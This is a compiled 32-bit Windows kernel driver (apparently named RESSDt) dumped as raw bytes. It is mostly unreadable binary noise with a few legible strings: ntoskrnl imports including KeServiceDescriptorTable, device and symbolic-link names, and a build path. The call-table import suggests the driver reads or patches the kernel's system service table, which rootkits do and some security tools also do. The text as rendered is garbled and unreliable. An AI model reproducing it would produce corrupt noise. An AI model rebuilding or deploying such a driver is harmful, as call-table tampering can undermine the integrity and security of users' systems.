                                                                                                                                                                                                                                                                                                                                         X  �  �               f   0  �                 H   `� �           B I N MZ�       ��  �       @                                   X  � �	�!�L�!This program cannot be run in DOS mode.
$                                                                                                                                                                                                                                                                                                                                                                                                       �l��p��p��p��p��p�_��p���p�]��p�X��p�Rich�p�                        PE  L y�G        � 
�  �      	  �        �   �             �  �  �V                                L	  (                              L   @                             p  @              4                           .text   P  �  �  �                 h.rdata       �                 @  H.data       �  �   �              @  �IINT    �   	      	                 �.reloc  h      �                  @  B                                                                                                        DisPatchCreate! �����̋�U��h� ��  Y�M�a 2��  3�]� ����̋�U��h� � �E�p� ]� ������jh` �  �  ��u�F`�H�P�U�^<�@�E܁�K�" uq�e� j_WWR� WWS� �M���E�� 9Pw�  ��>�� �%����"���� �   "��3���E� � �E�3�@Ëe�}��M���u�������#E܉F�~2ҋ��  ���	  � �\ D e v i c e \ R E S S D t     \ ? ? \ R E S S D t D O S   �����̋�U��SVW`3�+��3�a�u�( jY�� �~8�h� �� W�Fp� �F4� ��h� 3�PPj"WPV�$ ��|h� �� V��WV�  _^[]� ������% ������h� d�    P�D$�l$�l$+�SWV�e�E�P�E��E������E��E�d�    ËM�d�    Y_^[�Q��������%                                                 �	  �	  �	  �	  �	  
   
  0
  D
  \
  n
  �
                      y�G       >   �  �      ����m {     H                                                           �      RSDSx%�6Oq4M�	�tY�O_   e:\project\server\sys\i386\RESSdT.pdb           �                                                                                                                              �D��@�                                                                                                                               ��U�졄 ���@�  t;�u#�, �� ��3%��  �� w���� �У� ]����t	          �
                         �	  �
  �	  �	  �	  
   
  0
  D
  \
  n
  �
      �IofCompleteRequest              NIoDeleteDevice  PIoDeleteSymbolicLink   OKeServiceDescriptorTable  AProbeForWrite @ProbeForRead  �_except_handler3  FIoCreateSymbolicLink  =IoCreateDevice  RtlInitUnicodeString  cKeTickCount ntoskrnl.exe                                  DbgPrint                                                          L   �4�4�4�4�4�4#5,5:5�56666&6-646C6L6Q6\6n6y6�6d7h7�7�799#929;9B9                                                                                       �   00X0j0t0�0�0�01&1w1�122+2v2�2�23C3z3�3�344-4�4�4�4�4�4d5p5�5�5�5�5�5�5616a6g6�6�6�67G7\7i7�7�7�7�78&8P8r8�8�8�8 919[9}9�9:,:�:�:�;�;�<�<�<�< =<=I=X=e=r=�=�=3?`?}?�?�?�?�?�?    �   000#0E0�00151B1M1V1g1~1�1�1�1�1�1�2�2�2�2�2�2�2�23534k5w5�5�5�5�5�5�5[6`6p6{6�6�6�6�6�6�6�6Z7�7�7�7!8d8y8�8�8�9w=�=�=>>3>}>�>�>?�?�? 0  �   �0�0�0�0�0�0�0�0�0�0�0�0�0�0�01H1a1�1�1�1�122&2I2q2�2�2)3G3M3�3�394�4�4�4�45$5b5�5�56&6Z6`6{6�6�6�6�67n7�7�7�7�7�78V8t8�8�8�8�8�89U9�9�9�9:�:�:�:;;;7;f;�;�<�<�<&=7=H=�=>*>E>�>?3?]?�?�?�?�?   @    J0k0w0�0C1�1�1�1�1�1�1�12)252j2{2&3+3]3u3�3�3�3�3�344J4P4[4v4�4�4�4�4�4555'5/595K5S5g5o5y5�5�5�5�5�5�5�5 66#6:6U6]6l6�6�6�6�6�6�6777B7V7^7u7z7�7�7�7�7)858=8W8e8q8x8�8�8�8�8�8�8�893999�9�9�9�9�9:":<:\:u:�:�:�:s;�;�;S<u<<3=U=_=$>->4>?>E>O>V>c>r>~>�>�>�>s?�?�?   P  |  w0�0�0�01o1�1�1�1�1
22 2-242C2k2�2�2�2�2�2�2�20363B3U3^3n3�3�3�3�3�3�3$4,4U4h4o4�4�4 585?5T5k5�5�5�5�5�5,6�6�6�6�6�6�6�6�6�6�6�6�6�6�6�6'7.7D7W7]7o7x7�7�7�7�7�7"8'8A8I8U8l8z8�8�8�8�8�899/9C9U9^9e9�9�9�9�9�90:7:L:^:s:z:�:�:�:�:�:�:�:;:;L;e;j;p;y;�;�;�;�;�;�;�;�;<6<C<�<�<�<�<�<�<�<�<�<="=C=H=T=[=`=e=j=|=�=�=�=�=�=�=�=�=�=�=�=�=�=�=�=>>E>u>�>�>�>�>�>?!?J?f?�?�?�? `  �   '0P0�0�0�0�0	11=1�1262h2t2R3X3\3`3d3h3l3p3t3x3�3�3�4/5V5\5c5n5�5�5�5�5�5�5(6w6�6�6�6�6�67"7A7�7�7�7�7�7�7�7�7888"8<8H8X8g8q8�8�8�8�899/999B9X9�9:':N:x:|:�:�:�:�:s;�;
<�<=3=�=�=>�>P?_?}?�?�? p  �   y00�01/1;1p1|1�1�12O2\2�2�23"303G3X3�3�3�34E4^4r4�4�4�456"6'6D6�6767�7�7�7O8U8|8�8�8�8i9�9�9�9�9�9M:V:]:z:�:�:�:�:�:0;v;<<A<\<e<l<�<�<>!>->3>`>�>�>�>;?\?u?{?�?�?�?�?�?   �  H   050\0c0�0�0�0�0�0�0�01111#1(1-171<1R1W1d1�1�1�1�1�1�1�1�1�1�12h2m2|2�2�2�2�2�2�2�23	33.3C3K3z3e4�4�4�4�4�4�45525M5h5|5�5�5�5�5�5�5�5�566666#6/6N6Z6b6m6t66�6�6�6�6�67-7C7�7�7�7�7�7�7�78+8d8h8l8p8�8�8�8�8�8-9J9�9�9�9:E:P:W:j:z:�:;G;�;�;�;�;+<P<W<h<�<�<�<�<�<�<=(=/=q=x=�=�=�=�=�=>%>F>z>�>�>?? ?+?z? �  �   060;0Z0�0�0�0X1x1�1�1D2K2^2�2�2�2�2
3323F3Z3�3�3�3�3�3�3�3454S4X4`4u4�4�4�4�4[5e5�5�5�5�5O6f6r6�6�6.7J7
858?8�8�8�8r9|9�9�9�9�9�9:�:�:�:�:�:�:�:�:�;�<(=7=�=c>�>�>,? �  H   �0�1222222 2$2(2,2024282<2�2�2�2E4V5)6M6�6�7E9Q9`9o9�=�=�= �      �2�2�2�6T7�:�:�;:<�>)?   �  <   u0d1p3t3x3|3�3�3�3�3�3�3�3�3�3�3�5�5�5q77�8�8U:Z:   �     F14o4*;�;�;�<�<==L= �  D   o1{2o3�3�4�67�8�8�8�8�8�8�8�8�8�8W9w9�>�>�>?L?k?�?�?�?�?   �  �   000�1�12Q2�23�3�425B5H5j5p5�5�5�5�5666%6*6/646?6L6V6k6w6}6�6�67*70767<7B7H7N7T7Z7`7f7l7r7x7�7�7�78,8E8J8h8m8�8�8�8�8�8979W9w9�9�9�9�9�9:):A:\:     L   �3 444 4$4044484<4@4D4H4L4P4T4X4\4`4p4t4x4|4�4�4�4�4�4555(545    �   �1�1�1�1222(2D2L2T2`2|2�2�2�2�2�2�2�2�2 303D3P3l3x3�3�3�3�3�3�344 4P4\4d4p4x4�4�4�4�4�4�455(5D5L5X5t5|5�5�5�5�5�5�5�5�5 646@6\6h6�6�6�6�6�6�6�6�6 707D7P7X7l7|7�7�7�7�7�7�78,888T8   @ 0   0(080H4`6�6�6�6�6�6�6�6�6�6�6p7t7�7�7�7 P    0:                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              